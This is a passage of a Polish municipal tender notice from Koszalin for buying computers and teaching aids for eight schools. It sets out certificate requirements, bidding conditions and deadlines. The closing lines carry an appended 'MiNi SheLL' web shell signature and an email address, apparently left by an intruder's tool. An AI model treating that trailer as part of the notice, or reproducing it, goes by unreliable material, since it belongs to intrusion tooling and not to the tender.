mowa w ppkt 1 Zamawiający żąda od Wykonawcy Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. 3. Pełnomocnictwo do reprezentowania Wykonawcy określające jego zakres winno być złożone wraz z ofertą. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoby uprawnionej do reprezentowania Wykonawcy. W przypadku gdy Pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu poprzednim dokonuje mocodawca lub może dokonać również notariusz. 4. Zapisy ppkt 2 stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/><br/>II. <br/>C.d. treści zawartej w pkt 5.8.) Wykaz przedmiotowych środków dowodowych:<br/>(...) 5) Zadanie nr 6 – Dostawa pomocy dydaktycznych do SP nr 17 w Koszalinie:<br/>5.1) dla komputerów przenośnych:<br/>5.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>5.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>5.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>5.1.4)	Deklaracja zgodności CE;<br/>5.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny;<br/>6) Zadanie nr 7 – Dostawa pomocy dydaktycznych do SP nr 18 w Koszalinie:<br/>6.1) dla komputerów przenośnych<br/>6.1.1)	Certyfikat ISO 9001 dla producenta sprzętu lub dokument równoważny;<br/>6.1.2)	Certyfikat ISO 14001 dla producenta sprzętu lub dokument równoważny;<br/>6.1.3)	Certyfikat ISO 50001 dla producenta sprzętu lub dokument równoważny;<br/>6.1.4)	Deklaracja zgodności CE;<br/>6.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej sprzęt lub dokument równoważny<br/><br/>7)	Zadanie nr 8 – Dostawa pomocy dydaktycznych do I LO w Koszalinie:<br/>7.1) dla komputerów stacjonarnych typ I:<br/>7.1.1)	Certyfikat ISO 9001 dla producenta komputera lub dokument równoważny;<br/>7.1.2)	Certyfikat ISO 14001 dla producenta komputera lub dokument równoważny;<br/>7.1.3)	Certyfikat ISO 50001 dla producenta komputera lub dokument równoważny;<br/>7.1.4)	Deklaracja zgodności CE komputera;<br/>7.1.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej komputer lub dokument równoważny;<br/>7.1.6)	Deklaracja zgodności CE monitora;<br/>7.1.7)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej monitor lub dokument równoważny;<br/>7.2) Komputer stacjonarny typ II:<br/>7.2.1)	Certyfikat ISO 9001 dla producenta komputera lub dokument równoważny;<br/>7.2.2)	Certyfikat ISO 14001 dla producenta komputera lub dokument równoważny;<br/>7.2.3)	Certyfikat ISO 50001 dla producenta komputera lub dokument równoważny;<br/>7.2.4)	Deklaracja zgodności CE komputera;<br/>7.2.5)	Certyfikat ISO 9001 dla firmy (producenta lub autoryzowanego partnera serwisowego producenta) serwisującej komputer lub dokument równoważny; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	W przypadku, o którym mowa w ppkt 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują każdy samodzielnie brak podstaw do wykluczenia, o których mowa w Rozdziale I SWZ pkt 5.<br/>4)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców OŚWIADCZENIE, o którym mowa w Rozdziale I SWZ pkt 6 SWZ składa każdy z Wykonawców. Oświadczenia te winny potwierdzać brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Sposób składania oferty został opisany w Instrukcji interaktywnej „Oferty, wnioski i prace konkursowe” dostępnej na Platformie e-Zamówienia w zakładce „Centrum pomocy” oraz w Rozdziale I SWZ w pkt 14.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-17 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Pełna nazwa zamówienia:<br/>Zakup pomocy dydaktycznych w ramach projektu „Program poprawy jakości <br/>kształcenia ogólnego w Koszalinie” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach Działania 6.9 Programu Fundusze Europejskie dla Pomorza Zachodniego na lata 2021-2027.<br/><br/>2.Dot. ppkt 1.11.1) Nazwa podmiotu prowadzącego postępowanie: Postępowanie prowadzi Gmina Miasto Koszalin - Urząd Miejski w Koszalinie na rzecz:<br/>1) Szkoły Podstawowej nr 3 im. ks. Jana Twardowskiego w Koszalinie,<br/>2) Szkoły Podstawowej nr 4 im. Zdobywców Kosmosu w Koszalinie,<br/>3) Szkoły Podstawowej nr 6 im. Narodowego Święta Niepodległości w Koszalinie,<br/>4) Szkoły Podstawowej nr 7 im. I Armii Wojska Polskiego w Koszalinie,<br/>5) Szkoły Podstawowej nr 10 im. Stefana Żeromskiego w Koszalinie,<br/>6) Szkoły Podstawowej nr 17 im. Orła Białego w Koszalinie,<br/>7) Szkoły Podstawowej nr 18 im. Jana Matejki w Koszalinie,<br/>8) I Liceum Ogólnokształcącego im. Stanisława Dubois w Koszalinie<br/><br/>3. Wymagany termin realizacji zamówienia:<br/>1) Zadanie nr 1: 30 dni od dnia zawarcia umowy;<br/>2) Zadanie nr 2: 30 dni od dnia zawarcia umowy;<br/>3) Zadanie nr 3: 30 dni od dnia zawarcia umowy;<br/>4) Zadanie nr 4: 30 dni od dnia zawarcia umowy;<br/>5) Zadanie nr 5: 30 dni od dnia zawarcia umowy;<br/>6) Zadanie nr 6: 30 dni od dnia zawarcia umowy;<br/>7) Zadanie nr 7: 30 dni od dnia zawarcia umowy;<br/>8) Zadanie nr 8: 30 dni od dnia zawarcia umowy.<br/><br/>4. dot. SEKCJI VII - PROJEKTOWANE POSTANOWIENIA UMOWY - Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie Strony.<br/><br/>5. Zamówienia zostały ujęte w planach postępowań: <br/>1) dot. Zadania nr 1 -Szkoły Podstawowej nr 3 im. ks. Jana Twardowskiego w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00550275/01/P. Identyfikator pozycji planu: 1.2.1.<br/>2) dot. Zadanie nr 2 - Szkoły Podstawowej nr 4 im. Zdobywców Kosmosu w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00547932/01/P. Identyfikator pozycji planu: 1.2.1.<br/>3) dot. Zadania nr 3 - Szkoły Podstawowej nr 6 im. Narodowego Święta Niepodległości w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00554533/01/P. Identyfikator pozycji planu: 1.2.1.<br/>4) dot. Zadania nr 4 - Szkoły Podstawowej nr 7 im. I Armii Wojska Polskiego w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00550409/02/P. Identyfikator pozycji planu: 1.2.1.<br/>5) dot. Zadania nr 5 - Szkoły Podstawowej nr 10 im. Stefana Żeromskiego w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2023/BZP 00548939/03/P. Identyfikator pozycji planu: 1.2.2.<br/>6) dot. Zadania nr 6 - Szkoły Podstawowej nr 17 im. Orła Białego w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00021583/03/P. Identyfikator pozycji planu: 1.2.2.<br/>7) dot. Zadania nr 7 - Szkoły Podstawowej nr 18 im. Jana Matejki w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00558905/02/P. Identyfikator pozycji planu: 1.2.1.<br/>8) dot. Zadania nr 8 - I Liceum Ogólnokształcącego im. Stanisława Dubois w Koszalinie. Numer w Biuletynie Zamówień Publicznych pod którym został umieszczony plan to 2024/BZP 00548525/01/P. Identyfikator pozycji planu: 1.2.1.

Creat By MiNi SheLL
Email: jattceo@gmail.com